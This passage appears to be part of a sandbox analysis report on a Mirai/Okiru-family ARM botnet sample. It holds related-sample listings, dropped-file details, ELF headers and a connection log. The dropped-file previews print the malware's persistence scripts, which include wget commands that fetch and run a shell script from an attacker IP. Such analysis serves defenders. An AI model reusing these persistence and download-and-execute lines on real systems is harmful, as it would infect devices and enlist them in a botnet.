	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	91.189.91.42
	boatnet.arc.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	arm.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	185.125.190.26
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	nklarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	splarm6.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	nabarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
INIT7CH	sh4.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	109.202.202.202
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	arm.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	nklarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	nabarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	zerm68k.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	zerarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	armv4eb.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
NETIXBG	sh4.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mips.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/system	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
/etc/init.d/arm5.nn.elf	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/arm5.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	120
Entropy (8bit):	4.693568474155104
Encrypted:	false
SSDEEP:	3:KPJRXgLLINFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRgWfoYZX48bbaaeXCO
MD5:	8DFFCF3A432D7BE94BD66272A7843A4F
SHA1:	F12ACDA19CBADCD56A8B31E506B206607108F3C6
SHA-256:	F2ED717A910308BCD6BF77B8DA32927677BF2347E698C7328441039FA058DD3B
SHA-512:	7E5D9543F0EC22B197BAF6D7F603F26BD8DD7EAE1BA3923E5A2CE40DCAA4DB1F29C34F08E01383E78DA104CC57A4682AEDA45148FAB1EE0C05FCD2040FF3F5F0
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/arm5.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/arm5.nn.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	400
Entropy (8bit):	4.556318226272151
Encrypted:	false
SSDEEP:	12:QRkuSXNxuOPUJgjvMXAF/uKN+dRRucSOyd3:q7OcIygCYOM3
MD5:	CEA6D7FDF5D34EAD098731830D28EFD1
SHA1:	C588F0BDE3A4E226957FD984039DC38380A88130
SHA-256:	C5DA20324A7B4322DFD624A10DD36C4C4690BA4120594A62E1B05866B7E16DAF
SHA-512:	226D22E84E4AB6626B0FADCDA47461A838F9914C207C166882FE56EE9236ED5AC33C1FBDB0C3B99C1953C20D06FF3A3426858E4AD377F60E3562B5F234555044
Malicious:	true
Joe Sandbox View:	Filename: arm5.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/arm5.nn.elf..case "" in. start). echo 'Starting arm5.nn.elf'. /tmp/arm5.nn.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping arm5.nn.elf'. killall arm5.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/arm5.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	107
Entropy (8bit):	4.6965251577946185
Encrypted:	false
SSDEEP:	3:TKH4vZKgLLINFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8gWzSXoZX48bzBeLXE0
MD5:	56A20B8010967E0BBF4D367C6C6678E7
SHA1:	E74D28A6042152AF585346BDA4816C014C1483AE
SHA-256:	B658A9BEF0898E966B688A8C1EE81E4E03CA8A1B406AF38F8C433E76C61A748A
SHA-512:	54B1A75ACE77A6ACEDD7455BC4BBB33249267B66F5239C2B642BCD40E35F8856C353ECF4B953970EAD7485FB4262DE7D6792E66125910D335A988E305DFF4CC3
Malicious:	true
Joe Sandbox View:	Filename: arm5.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh./tmp/arm5.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/arm5.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	112
Entropy (8bit):	4.612586238908184
Encrypted:	false
SSDEEP:	3:nAWu5GLLINFDDoCvLdjX48FIbILbaaFOdFXa5O:AIWfoYZX48bbaaeXCO
MD5:	A6701DDA3B13E51FDA4150689D791627
SHA1:	1A4D5C8539CE2165D276C4CD23B7C2163C7ACB23
SHA-256:	228D730E94FE3A5AE12D32A8FCCF19803571B5FDAE0E9D56C6888A36070BB675
SHA-512:	88A10BB800D80E7AD85649547C8AF2B2EBEA8785CC1ABC7630DE42585B0FFC9878C99969D3AFB1BB9C9E878FA6FF585BC606D27B4917CA62625A5BA51951B5AD
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/arm5.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/arm5.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/arm5.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	103
Entropy (8bit):	4.539325085623206
Encrypted:	false
SSDEEP:	3:TggLLINFDvSDRFiLdjX48FIbILbaaFOdFXa50:TggWzSXoZX48bbaaeXC0
MD5:	4285A64E20071D282ECA02966971C65D
SHA1:	4D1217D64CB6A29D5265A396ABB7FD5B4B9FA884
SHA-256:	974DFB65D23D05BAA01868733165CDF6A1A46E832DD06C38D2E9802B8E750985
SHA-512:	DAFBCA656009981E6C1480DD648D065331B07AB8F0FFD2E33A3EB32ABB3B3BD032ECB09D60F5332F897801B0155934F8D20B8647C1F68D1E64725FEA674F8910
Malicious:	true
Preview:	/tmp/arm5.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/arm5.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/arm5.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	301
Entropy (8bit):	5.060578689320837
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+c802+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+c8p+GWRdtd+GWRXY+GWRuO
MD5:	91A6D600B58B4113EA0CA26CEAA9C7A5
SHA1:	9CFC9DC7C1B8A42EBC8DD165FD859BC521CA11A9
SHA-256:	A99D478E828173FB971A139BDB88010EC601F070CED7AFF9F05A1CABC2432ECE
SHA-512:	23015432C26246512FFB27E7AB125953C094CDA67398C27793ACB00F5CFE101D780F16C2B10FBDA9F8CFC6C6547BB4629375CC97CED08CF1541A357765FBDF10
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/arm5.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.wudUkZ (deleted)

Download File

Process:	/tmp/arm5.nn.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.6168746059562227
Encrypted:	false
SSDEEP:	3:TggLLINln:Tgg2n
MD5:	50495054883CEDEB77CB4F8D068EEFF6
SHA1:	14317EF270AC6D985392169FD7D00554C0B194A5
SHA-256:	BFDA309B362AADA1D8538EC8D72FAB3463F75473508028B5392BB333059CC60C
SHA-512:	F16AB5F0651079E58F6865C7E6CE6511766F98F157ACA7525C4A9D0F7B118BE8368D92D538BCED6F99D6F0D23C2A93D56099A598ECF9EE46EDD743995DA0D016
Malicious:	false
Preview:	/tmp/arm5.nn.elf.

Static File Info

General

File type:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy (8bit):	6.1892328831149115
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	arm5.nn.elf
File size:	88'528 bytes
MD5:	104d6c72a4834200420677e30b9fbe23
SHA1:	9fb08e68aefe810b2bb60e8aef9192e41d96f295
SHA256:	aa3a50f00215074e5cc2adff50ebf43cbd922699018e5af702c88cdc67c8b04e
SHA512:	82391e22c0d853d8f210927ebd46677d815ca90cbb4d82c0d3168ad42f3e99aef7e1d4a127e5057938e378d9b68320a64e7531ba180e62bc5aa2b35d9f27c4e4
SSDEEP:	1536:o9VfGPRzkPhk+W82TM4k6YjZIphmQcsEc+rYl0f0fPMo:o9VfGPRzXBM4wKphmrsE0l0UMo
TLSH:	3C833B51FD815623C5E522BAFA7E028D3B6613B8D2EF72178D25AF207386C2B0D77641
File Content Preview:	.ELF...a..........(.........4...@X......4. ...(.....................,S..,S..............0S..0S..0S.......&..........Q.td..................................-...L."...3K..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	ARM - ABI
ABI Version:	0
Entry Point Address:	0x8190
Flags:	0x2
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	88128
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8094	0x94	0x18	0x0	0x6	AX	4
.text	PROGBITS	0x80b0	0xb0	0x12d04	0x0	0x6	AX	16
.fini	PROGBITS	0x1adb4	0x12db4	0x14	0x0	0x6	AX	4
.rodata	PROGBITS	0x1adc8	0x12dc8	0x2564	0x0	0x2	A	4
.ctors	PROGBITS	0x25330	0x15330	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x25338	0x15338	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x25344	0x15344	0x4bc	0x0	0x3	WA	4
.bss	NOBITS	0x25800	0x15800	0x2214	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x15800	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8000	0x8000	0x1532c	0x1532c	6.2022	0x5	R E	0x8000	.init .text .fini .rodata
LOAD	0x15330	0x25330	0x25330	0x4d0	0x26e4	4.6305	0x6	RW	0x8000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 06:47:51.871330976 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 06:47:52.189019918 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:52.308675051 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:52.308757067 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:52.309009075 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:52.428488970 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:52.828052044 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:52.989845991 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:53.441332102 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:53.441432953 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:53.831849098 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:53.952655077 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:53.952750921 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:53.952802896 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:54.073134899 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:54.466125011 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:54.625868082 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:55.090857029 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:55.090961933 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:55.533543110 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:55.653121948 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:55.653196096 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:55.653261900 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:55.772701979 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:56.157412052 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:56.321894884 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:56.777827978 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:56.777896881 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:57.158582926 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:57.246599913 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 06:47:57.278254032 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:57.278309107 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:57.278337002 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:57.397927999 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:57.782550097 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:57.945852995 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:58.403875113 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:58.403939009 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:58.782351971 CET	42516	80	192.168.2.23	109.202.202.202
Dec 24, 2024 06:47:58.783916950 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:58.903378010 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:58.903450966 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:58.903472900 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:59.022959948 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 06:47:59.408054113 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:47:59.573848009 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:00.032258034 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:00.032465935 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:00.409214020 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:00.528789997 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:00.528875113 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:00.528938055 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:00.648397923 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:01.033457994 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:01.197839022 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:01.641956091 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:01.642023087 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:02.034876108 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:02.154386997 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:02.154453039 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:02.154467106 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:02.273979902 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:02.660455942 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:02.825848103 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:03.290474892 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:03.290539026 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:03.661746025 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:03.781277895 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:03.781332016 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:03.781363010 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:03.900823116 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:04.286047935 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:04.449837923 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:04.905210018 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:04.905271053 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:05.287019968 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:05.406636953 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:05.406708956 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:05.406791925 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:05.526278019 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:05.910660982 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:06.073937893 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:06.531887054 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:06.539661884 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:06.911571980 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:07.031119108 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:07.031192064 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:07.031243086 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:07.150883913 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:07.537442923 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:07.697978973 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:08.168119907 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:08.168210983 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:08.541409969 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:08.661154985 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:08.661494970 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:08.661494970 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:08.781374931 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:09.165932894 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:09.325834036 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:09.788036108 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:09.788117886 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:10.166903019 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:10.286494970 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:10.286557913 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:10.286581039 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:10.406100035 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:10.790482044 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:10.953828096 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:11.408523083 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:11.408618927 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:11.791594028 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:11.911226034 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:11.911333084 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:11.911390066 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:12.030900002 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:12.416802883 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:12.581942081 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:12.604440928 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 06:48:13.036561012 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:13.036746025 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:13.417958021 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:13.537694931 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:13.537863016 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:13.537923098 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:13.657478094 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:14.044949055 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:14.210144997 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:14.653223991 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:14.653306007 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:15.046102047 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:15.165730000 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:15.165812969 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:15.165885925 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:15.285454035 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:15.672904968 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:15.834006071 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:16.299746990 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:16.299943924 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:16.674242973 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:16.793951988 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:16.794054985 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:16.794125080 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:16.913700104 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:17.299216032 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:17.461811066 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:17.913727045 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:17.913933992 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:18.300157070 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:18.419811964 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:18.419881105 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:18.419909954 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:18.539474010 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:18.925555944 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:19.085813046 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:19.542706013 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 06:48:19.542793989 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:48:19.926541090 CET	60042	38242	192.168.2.23	94.156.227.234
